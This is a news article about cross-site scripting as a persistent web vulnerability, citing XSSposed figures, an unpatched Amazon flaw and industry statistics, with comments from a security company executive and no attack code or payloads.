XXS risk explained: How ‘cross-site scripting’ continues to translate into an attack vector coveted by identity thieves

By Rodika Tollefson

While many companies focus their efforts on preventing major breaches, cyber criminals are taking advantage of the lower-hanging fruit, like cross-site scripting (XSS).

Related article: Vulnerability exposed in SalesForce.com app

Despite a decline in XSS activity in the past couple of years, a large number of sites — even major ones like Amazon, Google and Facebook — have been found vulnerable.

 Amazon.com’s most recent vulnerability was reported on March 21 to the public archive XXSposed and was not patched for two days, putting both website users and administrators at risk of being compromised.

Cross-site scripting is a vulnerability found in web applications that allows hackers to inject a website script that will execute on the user’s browser.

This could allow bad actors to do anything from stealing personal information and accessing sensitive data to taking complete control over a machine through a drive-by-download attack.

Almost every large website is vulnerable to XSS,” says Ilia Kolochenko, CEO of High-Tech Bridge, a cybersecurity company focused on breach prevention through automated and manual penetration testing.

In 2004, when XSS first started to appear, the main and basically sole vector was stealing cookies while now it’s more about sophisticated phishing and drive-by download,” Kolochenko says.

Since its inception in June 2014, XSSposed had more than 8,900 reported vulnerabilities, and fewer than 1,300 of those were fixed. Its list includes more than 1,500 VIP websites, including sites like noaa.gov, weather.com and espn.go.com that still have unpatched vulnerabilities.

In a research and intelligence report about XSS published last December, IBM said that of the more than 900 dynamic Web application scans, 17 percent were found vulnerable by its team.

While this may not sound like a very high percentage, take into account that this data sample comes from organizations that have extremely mature and established security practices,” analyst Nikita Gupta wrote in the report.

For cybercriminals, vulnerable websites are attractive regardless of size, location or type of business, according to High-Tech Bridge.

High-profile ones could fetch as much as $1,000 on the black market, the company said. And while smaller ones may only cost $1, they’re much easier to compromise — making them just as attractive.

A White Hat Security 2014 Website Statistics Security Report showed that cross-site scripting was the most-common vulnerability in six of five programming languages.

Kolochenko said he expects to see the trends continue because detection of some subtypes of XSS is complicated and automated detection can’t detect all XSS.

He notes that a recent report by market research and consulting company Frost & Sullivan shows an increase in hybrid (automated and manual) testing of Web applications.

The report says that while businesses “continue to underestimate the risk associated with unprotected Web applications,” hackers are increasingly relying on automated methods “to target a broad set of victims.”

Kolochenko notes, “The XSS vulnerability discovered on Amazon.com is just another confirmation that automated scanning tools and solutions are not enough to assume continuous website security.”

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInEmail this to someone